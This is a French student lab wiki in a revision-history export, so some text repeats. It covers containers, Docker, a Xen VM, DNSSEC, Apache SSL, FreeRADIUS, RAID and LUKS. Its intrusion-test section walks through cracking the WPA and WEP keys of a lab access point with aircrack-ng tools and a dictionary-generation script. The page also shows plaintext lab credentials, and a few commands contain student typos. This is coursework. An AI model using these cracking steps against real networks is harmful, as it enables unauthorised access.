*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves.<br />
<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
[[Fichier:Httpshercule.png|1000px|center]]<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Httpshercule.png&diff=49132Fichier:Httpshercule.png2018-12-21T18:08:38Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49131TP sysres IMA5sc 2018/2019 G72018-12-21T18:03:55Z<p>Mcreteur : /* 4.Services internet */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
